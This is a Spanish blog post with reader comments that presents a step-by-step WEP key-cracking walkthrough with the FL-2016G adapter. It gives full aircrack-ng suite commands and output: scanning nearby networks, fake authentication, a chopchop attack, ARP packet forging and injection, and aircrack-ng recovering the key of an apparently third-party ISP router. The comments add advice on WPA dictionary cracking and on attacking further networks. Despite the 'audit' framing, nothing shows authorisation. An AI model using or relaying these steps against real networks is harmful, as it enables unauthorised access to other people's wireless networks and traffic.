Bueno como un usuario me ha enviado un mensaje preguntando como es el proceso para auditar con el FL-2016, aquí esta. Aunque el proceso es el mismo para todos los dispositivos, es cuestión de lanzar airmon-ng y mirar si detecta nuestro dispositivo USB, si no detecta podría ser necesaria parchear los drivers con el Compat-Wireless.
Bueno lo primero lanzamos airmon-ng. Para esto iniciamos el script airmon-ng tal como se muestra a continuación. Wlan2 es la interface como es reconocido nuestro dispositivo en Ubuntu.
root@computer:/home/delfi# airmon-ng start wlan2.
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
997 avahi-daemon
998 avahi-daemon
999 NetworkManager
19973 wpa_supplicant
21950 dhclient
Process with PID 21950 (dhclient) is running on interface wlan1
Interface Chipset Driver
wlan1 Unknown rt2800usb - [phy0]
wlan2 RTL8187 rtl8187 - [phy1]
(monitor mode enabled on mon0)
Una vez que hemos puesto el FL-2016G en modo monitor, podremos lanzar airodump-ng para escanear las redes que están a nuestro alcance para poder elegir un objetivo y centrarnos en una red en concreto.
root@computer:/home/delfi# airodump-ng mon0CH 10 ][ Elapsed: 4 s ][ 2011-11-30 03:04
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:76:FF:XX:XX:A4 -50 11 0 0 9 54e WEP WEP INFINITUMXXXXA
64:16:F0:31:XX:CD -61 9 0 0 11 54 WEP WEP INFINITUM74XX
00:18:3F:01:06:XX -62 2 0 0 11 54 . WEP WEP INFINITUM97XX
00:21:7C:C6:XX:XX -62 6 0 0 1 54 . WPA2 CCMP PSK Juanjo
98:2C:BE:10:ED:72 -60 7 0 0 1 54 WEP WEP INFINITUMXX31
F4:C7:14:6F:AB:7C -63 4 0 0 11 54e WEP WEP GREGORIO
5C:4C:A9:67:18:B4 -64 4 0 0 1 54e WEP WEP INFINITUMXXb4
00:E0:4C:XX:53:XX -67 2 0 0 11 54 WEP WEP PAKORP
BSSID STATION PWR Rate Lost Packets Probes
Una vez elegido el objetivo, lanzamos el siguiente comando para decirle a airodump-ng que escuche con nuestro dispositivo USB em modo monitor (mon0) en el canal (11) donde esta trasmitiendo el punto de acceso (64:16:F0:31:68:CD), el parametro --write es el nombre del archivo de nuestra captura.
root@computer:/home/delfi# airodump-ng --bssid 64:16:F0:31:68:CD --channel 11 --write wifikey mon0
CH 11 ][ Elapsed: 5 mins ][ 2011-11-30 03:09
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:16:F0:XX:XX:CD -60 0 2286 29042 76 11 54 WEP WEP OPN INFINITUM7XX9
BSSID STATION PWR Rate Lost Packets Probes
64:16:F0:31:XX:XX 00:C0:CA:40:XX:XX 0 0 - 1 1317340 151601
Ahora lo que haremos es realizar una falsa autenticación con el Punto de Acceso Wifi para que acepte cualquier paquete que le enviemos. Para esto, en consola realizamos lo siguiente.
root@computer:/home/delfi# aireplay-ng --fakeauth 0 -e INFINITUM7XX9 -a 64:16:F0:31:68:CD -h 00:C0:CA:40:B8:3E mon0
03:04:54 Waiting for beacon frame (BSSID: 64:16:F0:31:68:CD) on channel 11
03:04:55 Sending Authentication Request (Open System)
03:04:55 Authentication successful
03:04:55 Sending Association Request
03:04:55 Association successful :-) (AID: 1)
Tal como podemos ver, nos hemos asociado correctamente. lanzamos el ataque chopchop con el siguiente comando --chopchop o -4. En este caso el paramentro--chopchop significa que realizaremos el ataque chopchop, -b la dirección MAC del punto de acceso, -h la dirección MAC de nuestro dispositivo inalambrico y el mon0 es tal como es reconocido nuestro dispositivo.
root@computer:/home/delfi# aireplay-ng --chopchop -b 64:16:F0:XX:XX:XX -h 00:C0:CA:XX:XX:3E mon0
03:04:58 Waiting for beacon frame (BSSID: 64:16:F0:31:68:CD) on channel 11
Read 3616 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 64:16:F0:XX:XX:CD
Dest. MAC = 01:00:5E:00:XX:XX
Source MAC = 64:16:F0:31:XX:XX
0x0000: 0842 0000 0100 5e00 0001 6416 f031 68cd .B....^...d..1h.
0x0010: 6416 f031 68cd f089 e15e 4800 224d e95a d..1h....^H."M.Z
0x0020: f191 7a17 92fd 494c e866 d7fe 7200 d979 ..z...IL.f..r..y
0x0030: 8c57 92db d5ed 59c3 5a63 c78c e09c fc82 .W....Y.Zc......
0x0040: 0269 8709 952a 7d4a 443f 2139 3843 0fd5 .i...*}JD?!98C..
0x0050: e2ff 3aea e1aa ..:...
Use this packet ? y
Saving chosen packet in replay_src-1130-030631.cap
Offset 85 ( 0% done) | xor = 89 | pt = 23 | 78 frames written in 1342ms
Offset 84 ( 1% done) | xor = 94 | pt = 75 | 489 frames written in 8297ms
Offset 83 ( 3% done) | xor = BE | pt = 54 | 1785 frames written in 30360ms
Offset 82 ( 5% done) | xor = 3E | pt = 04 | 579 frames written in 9843ms
Offset 81 ( 7% done) | xor = FF | pt = 00 | 667 frames written in 11338ms
Offset 80 ( 9% done) | xor = E2 | pt = 00 | 77 frames written in 1309ms
Offset 79 (11% done) | xor = D5 | pt = 00 | 239 frames written in 4064ms
Offset 78 (13% done) | xor = 0F | pt = 00 | 238 frames written in 4047ms
Offset 77 (15% done) | xor = 42 | pt = 01 | 650 frames written in 11048ms
Offset 76 (17% done) | xor = 38 | pt = 00 | 273 frames written in 4642ms
Offset 75 (19% done) | xor = 39 | pt = 00 | 133 frames written in 2249ms
Offset 74 (21% done) | xor = 21 | pt = 00 | 701 frames written in 11929ms
Offset 73 (23% done) | xor = 57 | pt = 68 | 57 frames written in 969ms
Offset 72 (25% done) | xor = 30 | pt = 74 | 418 frames written in 7103ms
Offset 71 (26% done) | xor = EA | pt = A0 | 606 frames written in 10304ms
Offset 70 (28% done) | xor = E5 | pt = 98 | 482 frames written in 8194ms
Offset 69 (30% done) | xor = 0A | pt = 20 | 244 frames written in 4149ms
Offset 68 (32% done) | xor = 95 | pt = 00 | 244 frames written in 4147ms
Offset 67 (34% done) | xor = E2 | pt = EB | 404 frames written in 6869ms
Offset 66 (36% done) | xor = 93 | pt = 14 | 185 frames written in 3136ms
Offset 65 (38% done) | xor = E9 | pt = 80 | 436 frames written in 7408ms
Offset 64 (40% done) | xor = DE | pt = DC | 197 frames written in 3360ms
Offset 63 (42% done) | xor = 82 | pt = 00 | 192 frames written in 3264ms
Offset 62 (44% done) | xor = FC | pt = 00 | 194 frames written in 3297ms
Offset 61 (46% done) | xor = 9C | pt = 00 | 815 frames written in 13856ms
Offset 60 (48% done) | xor = E0 | pt = 00 | 1468 frames written in 24945ms
Offset 59 (50% done) | xor = 17 | pt = 9B | 316 frames written in 5383ms
Offset 58 (51% done) | xor = 29 | pt = EE | 230 frames written in 3909ms
Offset 57 (53% done) | xor = 07 | pt = 64 | 76 frames written in 1293ms
Offset 56 (55% done) | xor = 4B | pt = 11 | 99 frames written in 1684ms
Offset 55 (57% done) | xor = C2 | pt = 01 | 120 frames written in 2037ms
Offset 54 (59% done) | xor = 59 | pt = 00 | 192 frames written in 3266ms
Offset 53 (61% done) | xor = ED | pt = 00 | 177 frames written in 2998ms
Offset 52 (63% done) | xor = 35 | pt = E0 | 63 frames written in 1081ms
Offset 51 (65% done) | xor = 25 | pt = FE | 75 frames written in 1272ms
Offset 50 (67% done) | xor = 93 | pt = 01 | 147 frames written in 2503ms
Offset 49 (69% done) | xor = FF | pt = A8 | 229 frames written in 3892ms
Offset 48 (71% done) | xor = 4C | pt = C0 | 179 frames written in 3043ms
Offset 47 (73% done) | xor = EF | pt = 96 | 690 frames written in 11730ms
Offset 46 (75% done) | xor = D1 | pt = 08 | 295 frames written in 5014ms
Offset 45 (76% done) | xor = 02 | pt = 02 | 575 frames written in 9775ms
Offset 44 (78% done) | xor = 73 | pt = 01 | 249 frames written in 4233ms
Offset 43 (80% done) | xor = FE | pt = 00 | 67 frames written in 1140ms
Offset 42 (82% done) | xor = D7 | pt = 00 | 296 frames written in 5020ms
Offset 41 (84% done) | xor = C5 | pt = A3 | 97 frames written in 1660ms
Offset 40 (86% done) | xor = E6 | pt = 0E | 20 frames written in 341ms
Offset 39 (88% done) | xor = 50 | pt = 1C | 370 frames written in 6293ms
Offset 38 (90% done) | xor = 49 | pt = 00 | 228 frames written in 3869ms
Offset 37 (92% done) | xor = FD | pt = 00 | 231 frames written in 3930ms
Offset 36 (94% done) | xor = D7 | pt = 45 | 789 frames written in 13414ms
Offset 35 (96% done) | xor = 17 | pt = 00 | 229 frames written in 3892ms
Offset 34 (98% done) | xor = 72 | pt = 08 | 147 frames written in 2499ms
Saving plaintext in replay_dec-1130-030713.cap
Saving keystream in replay_dec-1130-030713.xor
Completed in 39s (1.23 bytes/s)
Como se mira en el código e imagen anterior, tuvimos éxito con el ataque chopchop. El archivo llamado keystream in replay_dec-1130-030713.xor lo utilizaremos para generar un paquete ARP con el famoso packetforge-ng. Nuestro objetivo es que el punto de acceso reenvié continuamente el paquete arp inyectado. Cuando lo reenvié obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.
root@computer:/home/delfi# packetforge-ng -0 -a 64:16:F0:31:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -yreplay_dec-1130-030713.xor -w ARP
Wrote packet to: ARP
Ahora la inyección del paquete ARP.
root@computer:/home/delfi# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:40:B8:3E)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 64:16:F0:XX:XX:XX
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:C0:CA:40:XX:XX
0x0000: 0841 0201 6416 f031 68cd 00c0 ca40 b83e .A..d..1h....@.>
0x0010: ffff ffff ffff 8001 e15e 4800 224d e95a .........^H."M.Z
0x0020: f191 7a11 d7fc 4150 e0c1 d7ff 73c2 1baf ..z...AP....s...
0x0030: f4c1 6cda ca12 59c2 4b07 2917 1f63 037d ..l...Y.K.)..c.}
0x0040: 2df5 fa27 -..'
Use this packet ? y
Saving chosen packet in replay_src-1130-030729.cap
You should also start airodump-ng to capture replies.
Por ultimo, una vez capturado los suficientes #datas, lanzamos aircrack-ng.delfi@computer:~$ aircrack-ng wifikey-01.cap
Opening wifikey-01.cap
Read 163102 packets.
# BSSID ESSID Encryption
1 64:16:F0:XX:XX:XX INFINITUM7XX9 WEP (25237 IVs)
Choosing first network as target.
Opening wifikey-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 25237 ivs.
Aircrack-ng 1.1
[00:00:07] Tested 83141 keys (got 25192 IVs)
KB depth byte(vote)
0 0/ 1 37(41728) 47(35840) 3C(34560) EA(33280) 68(32768) 93(32768) 0E(32512) DC(32512) 39(32256)
1 23/ 26 BD(30464) 7F(30208) 9A(30208) BB(30208) BE(30208) C4(30208) 76(29696) B1(29696) D4(29696)
2 0/ 19 61(34560) 16(33536) 2F(33536) ED(33024) 19(33024) EF(32768) 01(32512) 9D(32256) 9E(31488)
3 2/ 25 31(33280) 08(33280) 77(33024) C9(32768) D3(32768) B9(32512) 74(32256) BE(31744) 48(31744)
4 0/ 7 63(36096) A2(33024) BB(32512) 51(32512) C6(32256) A4(32000) F5(32000) 07(31744) 1F(31744)
KEY FOUND! [ 37:63:61:31:63 ] (ASCII: 7ca1c )
Decrypted correctly: 100%
Video: USB FL-2016G en acción desde Ubuntu 11.10
Vídeo Online
https://www.youtube.com/watch?v=rFUMPgYkGPM
Hola amigo como estas, muy util tu post, no me sabia bien los pasos para hacerlo con este programa. Queria consultarte si alguna vez y por esos momentos de bondad suprema que tiene la vida, pudiste descifrar una clave del tipo WPA. Probe muchas veces con este mismo chipset (8187), que va perfecto, y encontrar una clave WEP es una tarea muy grata incluso. Pero las WPA son un reto mayor, por eso queria saber si directamente dejo de intentar jeje. Ojala ande todo bien, un abrazo.
ResponderEliminarBuenas Jeremias.
ResponderEliminarMuchas gracias, un WPA solo en una ocasión pude realizarlo, ya que la clave era sencilla, 123456 y ya :D
Pero con claves mas complicadas y mas largas en caracteres es mas tardado, podría tardas días, ayudaría tambien el tener un buen diccionario de palabras (wordlist).
Haber si un día de estos tengo tiempo y realizo un vídeo del crakeo de wpa.
saludos!
Hola Delfi como te va, espero que todo bien. Hoy recibi la Awus de 2w, tenia la mortal certeza de que me iba a llegar una que no es original, pero menos mal que no che, hasta el holograma y todo. La APA-M04 vino por separado en el mismo paquete, todo sellado y cada uno en su caja. Tenias razon! el Wifiway reconocio el chipset enseguida sin instalar nada mas, ya hice 2 auditorias y todo de 10, la ventaja con esta antena es que muestra los niveles reales de señal, igual que ocurre en las placas wifi que vienen en las netbook. Yo tengo una Acer D250, es poco potente pero no la cambio por nada, y tambien muestra los niveles de verdad, cosa que no pasa con los adaptadores Nisuta. Gracias por guiarme con la compra, uno no sabe si comprar o no cuando todos dicen que no anda bien, pero esta buenisima! un abrazo.
ResponderEliminarHola Jeremias, me alegra que la compra haya salido todo bien. Eso de mostrar los niveles de señales es muy cierto, yo tengo otros 3 dispositivos USB, un Kasens g5000, el WifiSky y el FL-2016G que te engañan en cuanto a los niveles de señal, a la hora de conectar nada mas no conectan, en cambio el alfa 2W todo bien :) Bueno Jeremia recibe de mi parte un fuerte abrazo.
ResponderEliminarSaludos!
hoy porque no se puede inyectar ni crackear redes WEP que en la columna de MB tienen la letra e ejemplo 54e ...... sabes como crackearlas
ResponderEliminarEspera a que conecte un cliente (station) y lanzar el ataque, seguro que lo logras.
ResponderEliminar